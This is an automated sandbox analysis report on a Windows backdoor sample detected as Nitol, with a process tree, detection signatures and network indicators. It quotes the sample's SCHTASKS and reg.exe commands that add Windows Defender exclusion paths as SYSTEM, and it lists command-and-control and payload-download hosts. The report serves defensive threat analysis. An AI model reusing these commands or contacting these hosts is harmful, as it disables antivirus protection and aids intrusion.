Edit tour

Windows Analysis Report
149876985-734579485.05.exe

Overview

General Information

Sample name:	149876985-734579485.05.exe
Analysis ID:	1590025
MD5:	d21ced168a5267499378453eee404703
SHA1:	29ac1c528970d1e2423deb11b5998a2eb7c0842b
SHA256:	419fbd9b877c7d0c7f9874b5a87b8f446fe599608731ac5b447acc74315e6a67
Tags:	backdoorexesilverfoxwinosuser-zhuzhu0009
Infos:

Detection

Nitol

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus detection for dropped file

Detected unpacking (creates a PE file in dynamic memory)

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected Nitol

AI detected suspicious sample

Adds extensions / path to Windows Defender exclusion list (Registry)

Creates an undocumented autostart registry key

Drops PE files to the document folder of the user

Found direct / indirect Syscall (likely to bypass EDR)

Machine Learning detection for dropped file

Overwrites code with unconditional jumps - possibly settings hooks in foreign process

PE file contains section with special chars

Sample is not signed and drops a device driver

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Switches to a custom stack to bypass stack traces

Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)

Tries to detect virtualization through RDTSC time measurements

Uses cmd line tools excessively to alter registry or file data

Uses schtasks.exe or at.exe to add and modify task schedules

AV process strings found (often used to terminate AV products)

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to delete services

Contains functionality to dynamically determine API calls

Contains functionality to open a port and listen for incoming connection (possibly a backdoor)

Contains functionality to query CPU information (cpuid)

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality which may be used to detect a debugger (GetProcessHeap)

Creates COM task schedule object (often to register a task for autostart)

Creates a process in suspended mode (likely to inject code)

Creates driver files

Creates files inside the driver directory

Creates files inside the system directory

Creates or modifies windows services

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Dropped file seen in connection with other malware

Drops PE files

Drops PE files to the windows directory (C:\Windows)

Enables debug privileges

Entry point lies outside standard sections

Found dropped PE file which has not been started or loaded

Found evasive API chain (may stop execution after checking a module file name)

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

IP address seen in connection with other malware

Internet Provider seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May sleep (evasive loops) to hinder dynamic analysis

PE file contains sections with non-standard names

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Sigma detected: Windows Defender Exclusions Added - Registry

Uses code obfuscation techniques (call, push, ret)

Uses reg.exe to modify the Windows registry

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Yara signature match

Classification

Process Tree

System is w10x64

149876985-734579485.05.exe (PID: 7448 cmdline: "C:\Users\user\Desktop\149876985-734579485.05.exe" MD5: D21CED168A5267499378453EEE404703)

RgZ5EJ.exe (PID: 8004 cmdline: C:\Users\user\Documents\RgZ5EJ.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

RgZ5EJ.exe (PID: 7228 cmdline: C:\Users\user\Documents\RgZ5EJ.exe MD5: D3709B25AFD8AC9B63CBD4E1E1D962B9)

cmd.exe (PID: 4108 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2664 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 1596 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 2872 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7340 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 7440 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4852 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 928 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7248 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1804 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 1076 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 4040 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 4460 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Program Files (x86)\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 1668 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 3412 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

cmd.exe (PID: 2488 cmdline: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"%USERPROFILE%\Documents\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2716 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

schtasks.exe (PID: 7776 cmdline: SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\Users\user\Documents\" /t REG_DWORD /d 0 /f" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7780 cmdline: SCHTASKS /Run /TN "Task1" MD5: 76CD6626DD8834BD4A42E6A565104DC2)

schtasks.exe (PID: 7748 cmdline: SCHTASKS /Delete /TN "Task1" /F MD5: 76CD6626DD8834BD4A42E6A565104DC2)

YYAfLM.exe (PID: 5212 cmdline: "C:\Program Files (x86)\YYAfLM\YYAfLM.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cmd.exe (PID: 1664 cmdline: cmd /c echo.>c:\xxxx.ini MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)

conhost.exe (PID: 504 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 2836 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 404 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7104 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 1544 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 1376 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7548 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7628 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 2672 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 7696 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Program Files (x86)" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

cmd.exe (PID: 7724 cmdline: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 7752 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

reg.exe (PID: 340 cmdline: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\Users\user\Documents" /t REG_DWORD /d 0 /f MD5: 227F63E1D9008B36BDBCC4B397780BE4)

YYAfLM.exe (PID: 5960 cmdline: "C:\Program Files (x86)\YYAfLM\YYAfLM.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

XKXK7Ueky.exe (PID: 6104 cmdline: "C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

YYAfLM.exe (PID: 5436 cmdline: "C:\Program Files (x86)\YYAfLM\YYAfLM.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

XKXK7Ueky.exe (PID: 5928 cmdline: "C:\Program Files (x86)\1pZu9Rh\XKXK7Ueky.exe" MD5: 7B6586E21FBC8F2F0BB784A1A8FC65B4)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
Nitol		No Attribution	https://asec.ahnlab.com/en/44504/ https://blogs.technet.microsoft.com/microsoft_blog/2012/09/13/microsoft-disrupts-the-emerging-nitol-botnet-being-spread-through-an-unsecure-supply-chain/ https://en.wikipedia.org/wiki/Nitol_botnet https://krebsonsecurity.com/tag/nitol/	https://malpedia.caad.fkie.fraunhofer.de/details/win.nitol

Yara Signatures

Memory Dumps

Source	Rule	Description	Author	Strings
00000027.00000002.3583385721.0000000004CA0000.00000004.00000020.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
00000027.00000002.3584084700.000000001002D000.00000004.00001000.00020000.00000000.sdmp	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: YYAfLM.exe PID: 5212	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
Process Memory Space: YYAfLM.exe PID: 5212	PlugXStrings	PlugX Identifying Strings	Seth Hardy	0x115f4:$Dwork: d:\work 0x65b57:$Dwork: d:\work 0x98b6b:$Dwork: d:\work 0xbabdd:$Dwork: d:\work 0x2a094:$Shell6: Shell6 0x2ae73:$Shell6: Shell6

Unpacked PEs

Source	Rule	Description	Author	Strings
39.2.YYAfLM.exe.10000000.8.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
39.2.YYAfLM.exe.4ca03e8.5.raw.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
39.2.YYAfLM.exe.4ca03e8.5.unpack	JoeSecurity_Nitol	Yara detected Nitol	Joe Security
4.2.RgZ5EJ.exe.2790000.1.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x1fb0f:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fbc2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fcd2:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x1fc20:$e2: Add-MpPreference -ExclusionPath
39.2.YYAfLM.exe.3b60000.4.unpack	INDICATOR_SUSPICIOUS_DisableWinDefender	Detects executables containing artifcats associated with disabling Widnows Defender	ditekSHen	0x221dd:$e1: Microsoft\Windows Defender\Exclusions\Paths 0x2225b:$e2: Add-MpPreference -ExclusionPath

Sigma Signatures

System Summary

Sigma detected: Invoke-Obfuscation CLIP+ Launcher

Source: Process started

Author: Jonathan Cheong, oscd.community: Data: Command: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, CommandLine|base64offset|contains: , Image: C:\Windows\System32\cmd.exe, NewProcessName: C:\Windows\System32\cmd.exe, OriginalFileName: C:\Windows\System32\cmd.exe, ParentCommandLine: C:\Users\user\Documents\RgZ5EJ.exe, ParentImage: C:\Users\user\Documents\RgZ5EJ.exe, ParentProcessId: 7228, ParentProcessName: RgZ5EJ.exe, ProcessCommandLine: "C:\Windows\System32\cmd.exe" cmd.exe /c SCHTASKS /Create /F /TN "Task1" /SC ONCE /ST 00:00 /RL HIGHEST /RU "SYSTEM" /TR "cmd.exe /c reg add \"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\" /v \"C:\ProgramData\" /t REG_DWORD /d 0 /f" & SCHTASKS /Run /TN "Task1" & SCHTASKS /Delete /TN "Task1" /F, ProcessId: 4108, ProcessName: cmd.exe

Sigma detected: Invoke-Obfuscation VAR+ Launcher

Source: Process started

Sigma detected: Suspicious Windows Defender Folder Exclusion Added Via Reg.EXE

Source: Process started

Author: frack113: Data: Command: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, CommandLine|base64offset|contains: , Image: C:\Windows\System32\reg.exe, NewProcessName: C:\Windows\System32\reg.exe, OriginalFileName: C:\Windows\System32\reg.exe, ParentCommandLine: cmd.exe /c reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ParentImage: C:\Windows\System32\cmd.exe, ParentProcessId: 2836, ParentProcessName: cmd.exe, ProcessCommandLine: reg add "HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" /v "C:\ProgramData" /t REG_DWORD /d 0 /f, ProcessId: 7104, ProcessName: reg.exe

Sigma detected: Windows Defender Exclusions Added - Registry

Source: Registry Key set

Author: Christian Burkard (Nextron Systems): Data: Details: 0, EventID: 13, EventType: SetValue, Image: C:\Windows\System32\reg.exe, ProcessId: 7104, TargetObject: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData

Suricata Signatures

ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-01-13T13:55:52.256232+0100	2852901	1	Malware Command and Control Activity Detected	192.168.2.4	50018	8.210.209.78	8917	TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus detection for dropped file

Source: C:\Program Files (x86)\YYAfLM\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex
Source: C:\Program Files (x86)\1pZu9Rh\tbcore3U.dll	Avira: detection malicious, Label: TR/Redcap.vdzex

Multi AV Scanner detection for submitted file

Source: 149876985-734579485.05.exe

Virustotal: Detection: 6%

Perma Link

AI detected suspicious sample

Source: Submited Sample

Integrated Neural Analysis Model: Matched 100.0% probability

Machine Learning detection for dropped file

Source: C:\Program Files (x86)\YYAfLM\tbcore3U.dll	Joe Sandbox ML: detected
Source: C:\Program Files (x86)\1pZu9Rh\tbcore3U.dll	Joe Sandbox ML: detected

Compliance

Detected unpacking (creates a PE file in dynamic memory)

Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe

Unpacked PE file: 39.2.YYAfLM.exe.5540000.6.unpack

Source: unknown	HTTPS traffic detected: 59.110.190.21:443 -> 192.168.2.4:49736 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 59.110.190.21:443 -> 192.168.2.4:49740 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 118.178.60.9:443 -> 192.168.2.4:50011 version: TLS 1.2

Source:	Binary string: d:\work\iGiveButton\toolbar4\Release_bin\uninstall.pdb source: RgZ5EJ.exe, 00000006.00000003.2891470624.0000000004008000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3580652851.0000000001579000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000027.00000002.3580412823.0000000000348000.00000002.00000001.01000000.0000000A.sdmp, YYAfLM.exe, 00000027.00000000.3134169274.0000000000348000.00000002.00000001.01000000.0000000A.sdmp, YYAfLM.exe, 00000027.00000002.3580652851.00000000014EE000.00000004.00000020.00020000.00000000.sdmp, YYAfLM.exe, 00000028.00000000.3158159359.0000000000348000.00000002.00000001.01000000.0000000A.sdmp, YYAfLM.exe, 00000028.00000002.3174404361.0000000000348000.00000002.00000001.01000000.0000000A.sdmp, XKXK7Ueky.exe, 00000029.00000000.3160829714.00000000002C8000.00000002.00000001.01000000.0000000C.sdmp, XKXK7Ueky.exe, 00000029.00000002.3176579274.00000000002C8000.00000002.00000001.01000000.0000000C.sdmp, YYAfLM.exe, 0000002C.00000000.3278091028.0000000000348000.00000002.00000001.01000000.0000000A.sdmp, YYAfLM.exe, 0000002C.00000002.3292548319.0000000000348000.00000002.00000001.01000000.0000000A.sdmp, XKXK7Ueky.exe, 0000002D.00000002.3293558017.00000000002C8000.00000002.00000001.01000000.0000000C.sdmp, XKXK7Ueky.exe, 0000002D.00000000.3280752956.00000000002C8000.00000002.00000001.01000000.0000000C.sdmp, YYAfLM.exe.6.dr, XKXK7Ueky.exe.39.dr
Source:	Binary string: c:\tools_git_priv\truesight\driver\objfre_win7_amd64\amd64\TrueSight.pdb source: 189atohci.sys.0.dr
Source:	Binary string: y:\avsdk5\engine\make\build\public\64-bit\vseamps.pdb source: RgZ5EJ.exe, 00000004.00000000.2327090820.0000000140014000.00000002.00000001.01000000.00000008.sdmp, RgZ5EJ.exe, 00000004.00000002.2333822437.0000000140014000.00000002.00000001.01000000.00000008.sdmp, RgZ5EJ.exe, 00000006.00000000.2686734767.0000000140014000.00000002.00000001.01000000.00000008.sdmp, RgZ5EJ.exe.0.dr

Change of critical system settings

Adds extensions / path to Windows Defender exclusion list (Registry)

Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\ProgramData	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Program Files (x86)	Jump to behavior
Source: C:\Windows\System32\reg.exe	Registry key created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Users\user\Documents	Jump to behavior

Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler32	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocHandler	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer32	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\LocalServer	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\Elevation	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0F87369F-A4E5-4CFC-BD3E-73E6154572DD}	Jump to behavior
Source: C:\Program Files (x86)\YYAfLM\YYAfLM.exe	Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\TreatAs	Jump to behavior

Source: C:\Users\user\Documents\RgZ5EJ.exe

Code function: 4_2_00007FFE1A51A1B8 FindFirstFileExW,

4_2_00007FFE1A51A1B8

Source: C:\Users\user\Documents\RgZ5EJ.exe	File opened: C:\Users\user\AppData\Roaming	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	File opened: C:\Users\user	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	File opened: C:\Users\user\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\desktop.ini	Jump to behavior
Source: C:\Users\user\Documents\RgZ5EJ.exe	File opened: C:\Users\user\AppData	Jump to behavior

Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DFFE
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DDFF
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4x nop then movsxd rbx, qword ptr [r14+10h]	4_2_0000000140011270
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DE96
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DEFB
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000E178
Source: C:\Users\user\Documents\RgZ5EJ.exe	Code function: 4x nop then mov rax, qword ptr [rsp+78h]	4_2_000000014000DDD9

Networking

Suricata IDS alerts for network traffic

Source: Network traffic

Suricata IDS: 2852901 - Severity 1 - ETPRO MALWARE Backdoor/Win.Gh0stRAT CnC Checkin : 192.168.2.4:50018 -> 8.210.209.78:8917

Source: global traffic

TCP traffic: 192.168.2.4:50018 -> 8.210.209.78:8917

Source: Joe Sandbox View

IP Address: 118.178.60.9 118.178.60.9

Source: Joe Sandbox View

ASN Name: CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC CNNIC-ALIBABA-US-NET-APAlibabaUSTechnologyCoLtdC

Source: Joe Sandbox View

JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic	HTTP traffic detected: GET /i.dat HTTP/1.1User-Agent: 3MHost: khec3y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /a.gif HTTP/1.1User-Agent: 3MHost: khec3y.oss-cn-beijing.aliyuncs.comCache-Control: no-cache
